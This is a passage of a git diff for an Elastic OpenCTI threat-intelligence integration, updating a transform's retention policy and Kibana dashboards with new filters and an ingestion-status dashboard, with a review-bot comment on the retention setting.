+description: Latest OpenCTI IoC data
+frequency: 30s
+sync:
+ time:
+ field: "event.ingested"
+ # Updated to 120s because of refresh delay in Serverless. With default 60s,
+ # sometimes transform wouldn't process all documents.
+ delay: 120s
+retention_policy:
+ time:
+ field: opencti.indicator.invalid_or_revoked_from
+ max_age: 1m
+_meta:
+ managed: true
+ # Bump this version to delete, reinstall, and restart the transform during
+ # package installation.
+ fleet_transform_version: 0.1.0
diff --git a/packages/ti_opencti/img/screenshot1.png b/packages/ti_opencti/img/screenshot1.png
index ccd76578c2d..e99cd293a6a 100644
Binary files a/packages/ti_opencti/img/screenshot1.png and b/packages/ti_opencti/img/screenshot1.png differ
diff --git a/packages/ti_opencti/img/screenshot2.png b/packages/ti_opencti/img/screenshot2.png
index 545d85fbdef..d09f4022123 100644
Binary files a/packages/ti_opencti/img/screenshot2.png and b/packages/ti_opencti/img/screenshot2.png differ
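Review bot: The `retention_policy` block is the part of this transform that decides which indicators disappear from the latest index, yet it carries no comment on what populates `opencti.indicator.invalid_or_revoked_from` or on what happens to documents that never get that field, and a reader can easily take `max_age: 1m` for a typo without that context. Elasticsearch's time-based retention deletes destination documents whose field value is older than `max_age`, so documents with no value for the field are never aged out; whether the ingest pipeline sets the field on every superseded, revoked or expired indicator cannot be confirmed from this hunk and is worth verifying, since a gap there leaves stale IoCs in `logs-ti_opencti_latest.indicator` and in any detection rules that query it. I would add above `retention_policy:` a comment such as `# Removes an indicator from the latest index once invalid_or_revoked_from is more than 1m in the past; documents without this field are retained indefinitely.` so the behaviour and its dependency on the pipeline are explicit next to the setting.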
diff --git a/packages/ti_opencti/img/screenshot3.png b/packages/ti_opencti/img/screenshot3.png index e325ac4f834..234eed4f48b 100644 Binary files a/packages/ti_opencti/img/screenshot3.png and b/packages/ti_opencti/img/screenshot3.png differ diff --git a/packages/ti_opencti/img/screenshot4.png b/packages/ti_opencti/img/screenshot4.png new file mode 100644 index 00000000000..e325ac4f834 Binary files /dev/null and b/packages/ti_opencti/img/screenshot4.png differ diff --git a/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json b/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json index aee03e1c3ac..e08c4479e16 100644 --- a/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json +++ b/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json @@ -42,7 +42,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "### Navigation\n\n[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd) \n**[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd)**\n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Tags \u0026 Quality\n\nThis dashboard allows the exploration of tags and quality metrics for indicators ingested by the OpenCTI integration.", + "markdown": "### Navigation\n\n[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd) \n**[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd)** \n[OpenCTI Ingestion](/app/dashboards#/view/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624) \n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Tags \u0026 Quality\n\nThis dashboard allows the exploration of tags and quality metrics for current indicators ingested by the OpenCTI integration.", "openLinksInNewTab": false }, "title": "", 
@@ -58,12 +58,12 @@ "y": 0 }, "panelIndex": "9457bd9b-5ac6-4ca1-a220-b88f783d1587", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -72,7 +72,12 @@ }, { "id": "logs-*", - "name": "96ae6ce7-f243-42d6-8bb9-de60277b6175", + "name": "611380a6-8061-42ce-af79-e93f22ee5f64", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4bb48f19-a815-45c3-b9fd-69d30f2c1b8f", "type": "index-pattern" } ], @@ -97,7 +102,8 @@ "exclude": [ "forwarded", "opencti-indicator", - "ecs-indicator-detail" + "ecs-indicator-detail", + "preserve_original_event" ], "excludeIsRegex": false, "include": [], @@ -140,6 +146,50 @@ } }, "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "611380a6-8061-42ce-af79-e93f22ee5f64", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "4bb48f19-a815-45c3-b9fd-69d30f2c1b8f", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + }, { "$state": { "store": "appState" 
@@ -199,28 +249,24 @@ }, "panelIndex": "0f1a93c7-ce49-479c-a71d-42b60469bc11", "title": "Top 100 tags", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "3c59cfa0-0292-4164-8e1e-5e295c03878a", - "type": "index-pattern" } ], "state": { "adHocDataViews": {}, "datasourceStates": { "formBased": { + "currentIndexPatternId": "logs-*", "layers": { "71b1d087-bce6-4500-b278-55cc0b095db1": { "columnOrder": [ @@ -238,7 +284,8 @@ "exclude": [ "forwarded", "opencti-indicator", - "ecs-indicator-detail" + "ecs-indicator-detail", + "preserve_original_event" ], "excludeIsRegex": false, "include": [], @@ -287,6 +334,7 @@ } }, "incompleteColumns": {}, + "indexPatternId": "logs-*", "sampling": 1 } } @@ -304,7 +352,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "3c59cfa0-0292-4164-8e1e-5e295c03878a", + "index": "44890337-8f98-41af-bf85-eb3f2d51bb5d", "key": "event.dataset", "negate": false, "params": { 
@@ -317,6 +365,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "c601a528-0cf7-4772-b3bd-e6b539ea252c", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "3cdb4e06-c27c-4ab5-a1a7-ef328a7a2476", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -364,12 +456,12 @@ }, "panelIndex": "f789b019-a02c-47f1-bfe2-e3ff61d324c2", "title": "Tags", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -378,7 +470,17 @@ }, { "id": "logs-*", - "name": "30a35e84-12db-4d04-96a7-730e2be6292f", + "name": "529afafd-9447-4a7e-80ca-3cb28918e388", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "290b43ec-97e5-46eb-b7f4-6420595f01d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6632bf4b-421e-4098-a930-3cddfb30715c", "type": "index-pattern" } ], @@ -448,7 +550,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "30a35e84-12db-4d04-96a7-730e2be6292f", + "index": "529afafd-9447-4a7e-80ca-3cb28918e388", "key": "event.dataset", "negate": false, "params": { 
@@ -461,6 +563,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "290b43ec-97e5-46eb-b7f4-6420595f01d7", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "6632bf4b-421e-4098-a930-3cddfb30715c", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -510,12 +656,12 @@ }, "panelIndex": "7220547f-a0d6-463a-ab79-55ae71d6b36d", "title": "Indicators by confidence", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -524,7 +670,17 @@ }, { "id": "logs-*", - "name": "09aab673-4ab7-45ff-a1be-6effcc17a45a", + "name": "477c8a76-447e-42d1-a4db-648ad810bfda", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ae5d2a8e-2cb5-4998-87fd-f2d81a3795d1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "77d39d04-7bf8-45ba-97b4-829ff0f2a6b1", "type": "index-pattern" } ], @@ -595,7 +751,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "09aab673-4ab7-45ff-a1be-6effcc17a45a", + "index": "477c8a76-447e-42d1-a4db-648ad810bfda", "key": "event.dataset", "negate": false, "params": { 
@@ -608,6 +764,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "ae5d2a8e-2cb5-4998-87fd-f2d81a3795d1", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "77d39d04-7bf8-45ba-97b4-829ff0f2a6b1", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -657,12 +857,12 @@ }, "panelIndex": "7b259062-abe4-4e8c-83d4-41464e369378", "title": "Indicators by score", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -671,7 +871,17 @@ }, { "id": "logs-*", - "name": "4899e00d-792d-4c6c-9f4d-cf59dea58b1f", + "name": "a8369e4f-1281-4f9a-b443-3632c41c043f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "925ad221-2903-40e2-b5ab-052b68e6e9bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "32003949-df5d-4324-80c3-545f27ce763e", "type": "index-pattern" } ], @@ -742,7 +952,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "4899e00d-792d-4c6c-9f4d-cf59dea58b1f", + "index": "a8369e4f-1281-4f9a-b443-3632c41c043f", "key": "event.dataset", "negate": false, "params": { 
@@ -755,6 +965,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "925ad221-2903-40e2-b5ab-052b68e6e9bc", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "32003949-df5d-4324-80c3-545f27ce763e", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -804,8 +1058,7 @@ }, "panelIndex": "aacaa31c-1405-4b13-98cb-ec814db7915d", "title": "Indicators by TLP marking", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -819,7 +1072,17 @@ }, { "id": "logs-*", - "name": "f8807b7b-8ae7-4a97-bc7a-68651001577f", + "name": "35c49c70-647e-460b-9e06-33d6fa8ea069", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "678016dd-e965-4881-b864-e63ddbdf3a8c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8db319a5-f8a5-4387-a461-d3193840b201", "type": "index-pattern" } ], @@ -889,7 +1152,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "f8807b7b-8ae7-4a97-bc7a-68651001577f", + "index": "35c49c70-647e-460b-9e06-33d6fa8ea069", "key": "event.dataset", "negate": false, "params": { 
@@ -902,6 +1165,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "678016dd-e965-4881-b864-e63ddbdf3a8c", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "8db319a5-f8a5-4387-a461-d3193840b201", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -946,12 +1253,12 @@ }, "panelIndex": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870", "title": "Indicators by provider", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -960,7 +1267,17 @@ }, { "id": "logs-*", - "name": "43144698-c2fc-4373-a3b2-da7a2e126200", + "name": "48725819-5f5e-42ba-af75-b2330782dd81", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "09df8ebb-1c5b-4e74-84bc-b2e8552f9b59", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "890a47f4-ce5f-4ba9-af99-b2ac92d68c24", "type": "index-pattern" } ], @@ -1031,7 +1348,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "43144698-c2fc-4373-a3b2-da7a2e126200", + "index": "48725819-5f5e-42ba-af75-b2330782dd81", "key": "event.dataset", "negate": false, "params": { 
@@ -1044,6 +1361,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "09df8ebb-1c5b-4e74-84bc-b2e8552f9b59", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "890a47f4-ce5f-4ba9-af99-b2ac92d68c24", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1087,20 +1448,17 @@ }, "panelIndex": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa", "title": "Indicators by type", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs OpenCTI] Tags \u0026 Quality", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-29T16:55:10.516Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-16T10:44:14.700Z", "id": "ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", 
@@ -1109,17 +1467,17 @@ }, { "id": "logs-*", - "name": "0f1a93c7-ce49-479c-a71d-42b60469bc11:96ae6ce7-f243-42d6-8bb9-de60277b6175", + "name": "0f1a93c7-ce49-479c-a71d-42b60469bc11:611380a6-8061-42ce-af79-e93f22ee5f64", "type": "index-pattern" }, { "id": "logs-*", - "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "name": "0f1a93c7-ce49-479c-a71d-42b60469bc11:4bb48f19-a815-45c3-b9fd-69d30f2c1b8f", "type": "index-pattern" }, { "id": "logs-*", - "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:3c59cfa0-0292-4164-8e1e-5e295c03878a", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", "type": "index-pattern" }, { @@ -1129,7 +1487,17 @@ }, { "id": "logs-*", - "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:30a35e84-12db-4d04-96a7-730e2be6292f", + "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:529afafd-9447-4a7e-80ca-3cb28918e388", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:290b43ec-97e5-46eb-b7f4-6420595f01d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:6632bf4b-421e-4098-a930-3cddfb30715c", "type": "index-pattern" }, { @@ -1139,7 +1507,17 @@ }, { "id": "logs-*", - "name": "7b259062-abe4-4e8c-83d4-41464e369378:09aab673-4ab7-45ff-a1be-6effcc17a45a", + "name": "7b259062-abe4-4e8c-83d4-41464e369378:477c8a76-447e-42d1-a4db-648ad810bfda", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7b259062-abe4-4e8c-83d4-41464e369378:ae5d2a8e-2cb5-4998-87fd-f2d81a3795d1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7b259062-abe4-4e8c-83d4-41464e369378:77d39d04-7bf8-45ba-97b4-829ff0f2a6b1", "type": "index-pattern" }, { 
@@ -1149,7 +1527,17 @@ }, { "id": "logs-*", - "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:4899e00d-792d-4c6c-9f4d-cf59dea58b1f", + "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:a8369e4f-1281-4f9a-b443-3632c41c043f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:925ad221-2903-40e2-b5ab-052b68e6e9bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:32003949-df5d-4324-80c3-545f27ce763e", "type": "index-pattern" }, { @@ -1159,7 +1547,17 @@ }, { "id": "logs-*", - "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:f8807b7b-8ae7-4a97-bc7a-68651001577f", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:35c49c70-647e-460b-9e06-33d6fa8ea069", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:678016dd-e965-4881-b864-e63ddbdf3a8c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:8db319a5-f8a5-4387-a461-d3193840b201", "type": "index-pattern" }, { @@ -1169,7 +1567,17 @@ }, { "id": "logs-*", - "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:43144698-c2fc-4373-a3b2-da7a2e126200", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:48725819-5f5e-42ba-af75-b2330782dd81", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:09df8ebb-1c5b-4e74-84bc-b2e8552f9b59", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:890a47f4-ce5f-4ba9-af99-b2ac92d68c24", "type": "index-pattern" }, { @@ -1188,5 +1596,6 @@ "type": "index-pattern" } ], - "type": "dashboard" -} + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_opencti/kibana/dashboard/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624.json b/packages/ti_opencti/kibana/dashboard/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624.json new file mode 100644 index 00000000000..d4a90a3cd74 
--- /dev/null +++ b/packages/ti_opencti/kibana/dashboard/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624.json 
@@ -0,0 +1,735 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"782a85c3-7390-40db-831f-1de57a7ab792\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"782a85c3-7390-40db-831f-1de57a7ab792\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Indicator Provider\",\"enhancements\":{}}},\"9c11483b-80c0-47b0-9c38-049b35d37c32\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"9c11483b-80c0-47b0-9c38-049b35d37c32\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Navigation\n\n[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd) \n[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd) \n**[OpenCTI Ingestion](/app/dashboards#/view/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624)** \n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Ingestion\n\nThis dashboard is useful for understanding ingestion status.\n\nOther dashboards exclude indicator records that are superseded, revoked or 
expired. Here you can see all source indicators as they are ingested into `logs-ti_opencti.indicator-*`, and compare that with the latest current indicators in `logs-ti_opencti_latest.indicator`.\n \nThe event kind breakdown is useful for detecting ingest errors.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "7dd4d0ca-2e33-4155-b1aa-7c9d17a5a00c", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "7dd4d0ca-2e33-4155-b1aa-7c9d17a5a00c", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "71b1d087-bce6-4500-b278-55cc0b095db1": { + "columnOrder": [ + "18405c62-12ca-4f52-9dd4-44841611dc48", + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4", + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "columns": { + "18405c62-12ca-4f52-9dd4-44841611dc48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 12 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "7a98f087-f10a-4e9e-b976-19f3106ffc06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 12 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "7a98f087-f10a-4e9e-b976-19f3106ffc06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Indicators", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + 
"9ac32596-4ad4-43ae-b5f5-76acff8f10c4": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Ingested", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "event.ingested" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "31b6973a-4a2d-4f25-88a4-efee558b9e7d", + "key": "labels.is_ioc_transform_source", + "negate": false, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e93bb414-ba64-469e-812b-34f59ffb0e46", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.dataset", + "index": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "ti_opencti.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "ti_opencti.indicator" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": 
"18405c62-12ca-4f52-9dd4-44841611dc48", + "xAccessor": "9ac32596-4ad4-43ae-b5f5-76acff8f10c4" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "aeb2eb33-9329-4f94-ba7e-5ca920428cd0", + "w": 38, + "x": 10, + "y": 13 + }, + "panelIndex": "aeb2eb33-9329-4f94-ba7e-5ca920428cd0", + "title": "Source indicators by type (may be superseded, revoked, or expired), logs-ti_opencti.indicator-*", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "71b1d087-bce6-4500-b278-55cc0b095db1": { + "columnOrder": [ + "18405c62-12ca-4f52-9dd4-44841611dc48", + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4", + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "columns": { + "18405c62-12ca-4f52-9dd4-44841611dc48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 12 values of event.kind", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "7a98f087-f10a-4e9e-b976-19f3106ffc06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 12 + }, + "scale": "ordinal", + "sourceField": "event.kind" + }, + "7a98f087-f10a-4e9e-b976-19f3106ffc06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Indicators", + "operationType": "count", + "params": 
